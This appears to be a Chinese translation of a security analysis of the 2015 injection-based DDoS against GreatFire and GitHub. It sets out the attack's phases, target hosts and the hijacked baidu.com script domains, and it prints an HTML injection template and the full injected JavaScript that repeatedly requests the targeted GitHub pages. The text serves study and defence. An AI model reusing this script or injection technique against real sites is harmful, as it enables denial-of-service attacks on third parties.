为了防止恶意用户发布恶意内容，我们的安全分析浏览器都在虚拟机上运行。这使我们能够确定一个网页是否包含恶意内容，避免那些利用用户浏览器的JavaScript发起的攻击。我们每天会分析数以百万计的网页，通过机器学习算法选择考察的网页，大体上覆盖了所有的网络。

在三月中旬，出现几起针对审查监测机构GreatFire的拒绝服务攻击。研究人员分析了大量这种DDoS攻击，发现了它的攻击原理，它是通过网络运营商进行的，拦截良性网页的内容并注入恶意的JavaScript代码。比如将托管在baidu.com的网页分析JavaScript代码和HTML资源，替 换成包含攻击片断的JavaScript代码，这些代码会向被攻击的域名持续发送请求。

注* GreatFire 是托管在Github上面的开源项目，此次攻击的目的可能是希望这个项目从Github中移除。在中国这种劫持手法其实很常见，如有些网络运营商会偶 尔拦截某些网站并注入广告或更换下载文件链接等，这种技术可能是第一次被用来发动DDoS攻击。

在这篇博客中，我们分析了从2015年3月1日到4月15日的数据。首次发现安全浏览在baidu.com中注入攻击代码是在3月3日，2015年我们的观察到的最后一次注入攻击是在2015年4月7日。下面攻击发动的曲线图：




我们注意到，这次攻击分为多个阶段。第一阶段似乎是一个测试，从3月3日进行到3月6日。初始测试的目标是114.113.156.119:56789和并且请求的数目被人为限制。从3月4号到3月6日，请求限制被移除。

下一个阶段是在3月10日到13日，针对下面的IP地址进行：203.90.242.126。该IP地址的域名为sinajs.cn下的主机。 3月13日，攻击扩大到d1gztyvw1gvkdq.cloudfront.net。起初，请求都通过HTTP，然后升级到HTTPS。 3月14日，攻击都通过HTTP和HTTPS开始真正的和有针对性指向d3rkfw22xppori.cloudfront.net。直到3月17日。

3月18日，受攻击的主机增加到：
d117ucqx7my6vj.cloudfront.net，d14qqseh1jha6e.cloudfront.net，d18yee9du95yb4.cloudfront.net，d19r410x06nzy6.cloudfront.net，d1blw6ybvy6vm2.cloudfront.net

这也是我们第一次发现注射截断其中的非功能性Javascript。在此攻击过程的某个时刻，CloudFront的主机开始将请求302重定向到 greatfire.org以及其他域名。使用替换的Javascript在3月20日完全停止，但HTML页面注入还在继续。而使用 Javascript注入会破坏了原始网页的功能，HTML注入则没有。HTML被修改成包括原始内容和注入攻击Javascript代码的内容，如下所示：

1. <html>
2. <head>
3. <meta name="referrer" content="never"/>
4. <title> </title>
5. </head>
6. <body>
7. <iframe src="http://pan.baidu.com/s/1i3[...]?t=Zmh4cXpXJApHIDFMcjZa" style="position:absolute; left:0; top:0; height:100%; width:100%; border:0px;" scrolling="yes"></iframe>
8. </body>
9. <script type="text/javascript">
10. [... 注入攻击的JavaScript代码 ...]

通过该技术，web浏览器会获取相同的HTML页面两次，但由于查询参数t的存在，第二个请求没有进行注入。被攻击的域名也发生了变化，现在包括了：dyzem5oho3umy.cloudfront.net，d25wg9b8djob8m.cloudfront.netd28d0hakfq6b4n.cloudfront.net。

这个阶段进行了约10小时后，我们看到他们302重定向到一个不同域名的目标服务器。

注**.cloudfront.net　重定向到了 github.com

针对CloudFront的主机攻击在3月25日停止。相反，托管在github.com资源则现于被攻击状态。第一个新的目标是 github.com/greatfire/wiki/wiki/nyt/，很快就跟着github.com/greatfire/github.com/greatfire/wiki/wiki/dw/。

在3月26日，一个包含混淆攻击的Javascript代码取代了原来的版本并开始瞄准以下资源：github.com/greatfire/和 github.com/cn-nytimes/。在这里，我们也观察到一些拦截注入。对GitHub的攻击似乎在2015年4月7日停止，这是看到最后一次观测到的注入攻击。

从三月攻击开始到四月停止，我们观测到19种独特的Javascript版本（ＭＤ５）。

对于HTML注入，他们的MD5校验和内容有关系，所以我们没有提供。注入的Javascript非常类似于上面提到的那种方式。 我们的系统观测到以下八个baidu.com域名和对应的IP地址被进了注入攻击： cbjs.baidu.com（123.125.65.120）eclick.baidu.com（123.125.115.164）hm.baidu.com（61.135.185.140）pos.baidu.com（115.239.210.141）cpro.baidu.com（115.239.211.17）bdimg.share.baidu.com（211.90.25.48）pan.baidu.com（180.149.132.99）wapbaike.baidu.com（123.125.114.15）

注入的Javascript的大小介于995到1325个字节之间。

我们希望这份报告有助于了解这种攻击的整体情况。它还表明，在目前的网络环境下，攻击者可能会借助一些安全的浏览器，任何人都将无法防范。这也表明，从背后分析这种攻击其实是很难的。

如果整个网络都通过TLS传送并加密，这样的注入攻击就不可能出现。这进一步增加了我们将网络过渡到全加密来保护完整性的动机。不幸的是，防御这种攻击对于网站经营者来说是不容易的。

注*　其中一段攻击JavaScript代码，大概内容是每２秒在html中加入一段script,　url地址指向并访问　https://github.com/greatfire/ ， 从代码可以分析出，其实任何被攻击的主机都无法防范（如从http发动针对https的攻击），除非整个互联网都进入https时代（如果发生劫持，安全浏览器会发出警告）

1. document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
2. !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
3. startime = (new Date).getTime();
4. var count = 0;
5.  
6. function unixtime() {
7. var a = new Date;
8. return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
9. }
10. url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
11. NUM = url_array.length;
12.  
13. function r_send2() {
14. var a = unixtime() % NUM;
15. get(url_array[a])
16. }
17.  
18. function get(a) {
19. var b;
20. $.ajax({
21. url: a,
22. dataType: "script",
23. timeout: 1E4,
24. cache: !0,
25. beforeSend: function() {
26. requestTime = (new Date).getTime()
27. },
28. complete: function() {
29. responseTime = (new Date).getTime();
30. b = Math.floor(responseTime - requestTime);
31. 3E5 > responseTime - startime && (r_send(b), count += 1)
32. }
33. })
34. }
35.  
36. function r_send(a) {
37. setTimeout("r_send2()", a)
38. }
39. setTimeout("r_send2()", 2E3);